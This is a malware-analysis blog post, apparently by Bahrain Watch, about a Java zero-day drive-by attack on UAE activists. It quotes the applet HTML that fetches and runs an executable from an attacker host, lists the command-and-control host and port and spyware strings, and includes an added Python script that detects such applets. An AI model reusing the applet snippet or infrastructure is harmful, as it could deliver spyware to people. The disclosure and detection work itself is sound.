Posted by & filed under AmanTech, Spy Watch.


Early in the morning on January 13, 2013, Bahrain Watch was contacted by an activist in the United Arab Emirates.  This individual had received a suspicious-looking e-mail containing a link to a video involving Dubai’s Chief of Police.


The Video Link

The video link pointed to the following website, whose URL appears designed to resemble that of a YouTube video: http://cedarkeyrv.com/v2flashslideshow/watchv=Vpalz_trJdK.html.

Clicking on the link displayed the following in a web browser for around thirty seconds, before refreshing to load a YouTube video:

[Screenshot: the “loading video” page shown before the redirect]


Inspection of the HTML source code of the page revealed that it contained an embedded Java applet:

<APPLET code='NewApplet.class' archive='JavaApplication3.jar' >
<param name='x' value='http://isteeler.com/ini.exe'>
</APPLET>


The Java Applet

Bahrain Watch downloaded and decompiled the Java Applet, and found it to be an instance of the recent zero-day Java exploit, CVE-2013-0422.  The exploit has been widely reported in the media.  In response to it, the Department of Homeland Security advised users to temporarily disable the Java plugin in their web browser.  The Java vulnerability was still unpatched when the activist in the UAE received this e-mail; Oracle released a fix around twelve hours later.

The particular flavor of the exploit seems slightly different from the version seen in Metasploit, though it is similar to other versions of the exploit found on Google.  In particular, the flavor used here loads the class file from a hex-encoded string named ByteArrayWithSecOff, rather than from a .class file within the .jar file.  The hash of the exploit is:

MD5: c04b3896d36ca975cda8c8446ed33c0d
SHA1: 5dc7097896c98a5871674015436aedd7a6b48e63
SHA256: bfadf79b639716ee6c3858d0b298c35dcc7fd7d472cdc512a7dc8009321df737


The corresponding VirusTotal analysis shows a detection rate of 6/46.

The exploit downloads whatever URL is specified in the applet parameter “x” on the webpage that embeds the Java applet.  In this case, the URL is:

http://isteeler.com/ini.exe


That URL is still available as of the time of this posting.  The exploit writes the downloaded payload to a temporary folder on disk as “JUPDATE.exe” and then executes it.

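As an added defensive example (not code from the original post), the following Python checks a page's HTML for the drive-by pattern described above: an applet whose parameter carries a URL to an executable, and a YouTube-style "watch...v=" lure path on a non-YouTube host. The function names, the extension list and the sample HTML are constructed here, modelled on the snippet quoted earlier.

```python
"""Flag HTML pages that embed a Java applet whose parameter points at an executable."""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

EXEC_EXT = (".exe", ".scr", ".dll", ".jar", ".bat", ".com")   # assumed watch-list

class AppletCollector(HTMLParser):
    """Collects every <applet> tag together with its <param> name/value pairs."""
    def __init__(self):
        super().__init__()
        self.applets, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)                      # HTMLParser lowercases tag and attribute names
        if tag == "applet":
            self._cur = {"code": a.get("code"), "archive": a.get("archive"), "params": {}}
        elif tag == "param" and self._cur is not None:
            self._cur["params"][a.get("name", "")] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "applet" and self._cur is not None:
            self.applets.append(self._cur)
            self._cur = None

def find_suspicious_applets(html):
    """Return applets whose parameters carry an http(s) URL ending in an executable extension."""
    p = AppletCollector()
    p.feed(html)
    hits = []
    for ap in p.applets:
        for name, value in ap["params"].items():
            u = urlparse(value)
            if u.scheme in ("http", "https") and u.path.lower().endswith(EXEC_EXT):
                hits.append({"archive": ap["archive"], "param": name, "url": value})
    return hits

def is_youtube_lookalike(url):
    """True for a 'watch...v=' style path served from a host that is not YouTube."""
    u = urlparse(url)
    host = u.netloc.lower().split(":")[0]
    target = u.path + "?" + u.query
    return bool(re.search(r"watch\??v=", target, re.I)) and not host.endswith(("youtube.com", "youtu.be"))

# Constructed sample modelled on the <APPLET> snippet quoted in the post (not the live page).
SAMPLE_HTML = """<html><body>
<APPLET code='NewApplet.class' archive='JavaApplication3.jar' >
<param name='x' value='http://isteeler.com/ini.exe'>
</APPLET>
</body></html>"""
```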

The Payload

The hash of the payload is:

MD5: e5dc7ecfc5578d51ba92ff710b05ae09
SHA1: 1689a8af161ad5a1696a0f9982693d3fbb95a99f
SHA256: d0cd80cb28f52cab3ec61bf89f98f4601a27074d98c4828736898a287acacb74


The corresponding VirusTotal analysis shows a detection rate of 5/40.

The payload is a PE file that appears to be packed with ASProtect v1.23 RC1.  The unpacked binary (unpacked with QuickUnpack 2.2) appears to contain a compiled Delphi project.  A full analysis was not performed due to time constraints.  Based on a memory image of an infected computer, the payload appears to be similar to the SpyNet Remote Administration Toolkit, or a piece of spyware derived from the SpyNet source code.  SpyNet reportedly offers a full suite of functionality on a victim’s computer to the attacker, including keylogging and password stealing, viewing a victim’s screen, and turning on a victim’s webcam.  The following were among the strings found in the memory image:

XX--XX--XX.txt
XX-XX-XX.txt
SPY_NET_RATMUTEX
_x_X_PASSWORDLIST_X_x_
_x_X_UPDATE_X_x_
_x_X_BLOCKMOUSE_X_x_
NOIP.abc
MSN.abc
FIREFOX.abc
IELOGIN.abc
IEPASS.abc
IEAUTO.abc
IEWEB.abc
UuU.uUu
XxX.xXx


SpyNetCoder — the individual who writes SpyNet — apparently offered to sell a version of his source code for $300.  Binary versions of SpyNet are also apparently available for 50 Euros.

The Command & Control server associated with this payload is:

storge.myftp.org:15999


This domain name, in combination with several different ports, has been used many times over the past three months in attacks on UAE activists.  As of the time of this writing, that domain name resolves to:

109.169.17.234
SDN Systems Pte Ltd
8 Wilkie Road
#03-01 Wilkie Edge
Singapore
GB

The Hacked Website

The domain name of the website that ran the Java exploit was http://cedarkeyrv.com/, which is the website for the “Cedar Key Sunset Isle RV Park & Motel,” an “RV Bed and Breakfast” establishment in Cedar Key, Florida.  The term “RV” stands for “Recreational Vehicle,” and refers to a vehicle that contains amenities such as a kitchen, bed, and bathroom.  According to the site:

The Sunset Isle RV Park and Motel of Cedar Key, Florida offers the finest and friendliest RV park, campground and motel you’ll find in the Cedar Key vicinity.

The site was compromised by a hacker, who added the exploit to the website.  The following is a sample directory listing from the hacked site, showing the files uploaded by the hacker:

[Screenshot: directory listing from the hacked site showing the uploaded files]


The hacker also inserted the exploit into the homepage of cedarkeyrv.com.  Thus, individuals who were not specifically targeted were also infected if they visited the Cedar Key homepage.

Bahrain Watch contacted the hosting company, Journey1, and alerted them to the hack.  They investigated, found, and removed other instances of the exploit on the same website.  All instances of the exploit on the website that Bahrain Watch detected have since been removed.

The website isteeler.com is still hosting the same exploit on its homepage.  This website may belong to the attackers.  Bahrain Watch has contacted Namecheap hosting, asking them to take down the website.


The Big Picture

Bahrain Watch believes that the UAE Government is behind ongoing attacks on UAE activists, including this attack.  This is the first instance of a cyberattack against UAE or Bahraini activists that has involved the compromise of a third-party website, as far as Bahrain Watch is aware.

Those who operate in a way that is contrary to the Government’s political wishes in the UAE and Bahrain are under constant attack from a number of threats, including spyware.  Bahrain Watch advises Internet users to avoid clicking on unsolicited links, or opening unsolicited e-mail attachments, even those purportedly from friends.  If you do receive a suspicious e-mail or link, please contact [email protected].  Forwarding suspicious links and attachments helps us protect others.
